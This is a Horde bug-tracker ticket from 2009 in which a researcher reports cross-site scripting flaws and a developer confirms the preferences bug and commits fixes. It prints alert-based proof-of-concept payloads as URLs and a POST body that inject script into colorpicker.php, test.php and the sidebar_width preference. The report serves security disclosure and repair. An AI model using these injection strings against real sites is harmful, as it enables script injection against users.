5.2.0-git
04/17/2014

[#8399] Number preferences are not validated properly
Summary Number preferences are not validated properly
Queue Horde Base
Queue Version HEAD
Type Bug
State Resolved
Priority 2. Medium
Owners chuck (at) horde (dot) org
Requester security (at) davidwharton (dot) us
Created 07/03/2009 (1749 days ago)
Due
Updated 07/11/2009 (1741 days ago)
Assigned 07/11/2009 (1741 days ago)
Resolved 07/11/2009 (1741 days ago)
Milestone 3.3.5
Patch No

History
07/11/2009 11:40:05 PM Chuck Hagenbuch Comment #4
Taken from Horde DevelopersHorde Developers
State ⇒ Resolved
Reply to this comment
Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cvs).
07/11/2009 09:08:06 PM Chuck Hagenbuch Comment #2
Milestone ⇒ 3.3.5
Version ⇒ HEAD
State ⇒ Assigned
Summary ⇒ Number preferences are not validated properly
Assigned to Horde DevelopersHorde Developers
Assigned to Chuck Hagenbuch
Reply to this comment
Multiple cross site scripting vulnerabilites exist.  Proof of concepts:
Horde 3.1 has been deprecated for a long time. The current stable 
version is 3.3, and we backport serious security fixes to 3.2.
http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>
https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["
This file doesn't exist in 3.2 or later.
This was fixed almost 2 years ago, before 3.2.0:

http://cvs.horde.org/diff.php/horde/templates/test/extensions.inc?r1=1.8&r2=1.9
POST to http://hordeserver.com/horde/services/prefs.php with the
following content:
actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on



This I can actually reproduce as a problem. Patch forthcoming.
07/03/2009 06:48:49 PM security (at) davidwharton (dot) us Comment #1
State ⇒ Unconfirmed
Patch ⇒ No
Milestone ⇒
Queue ⇒ Horde Base
Summary ⇒ Multiple Cross Site Scripting Vulnerabilities
Type ⇒ Bug
Priority ⇒ 2. Medium
Reply to this comment
Multiple cross site scripting vulnerabilites exist.  Proof of concepts:



http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>



https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["



https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>



POST to http://hordeserver.com/horde/services/prefs.php with the 
following content:



actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on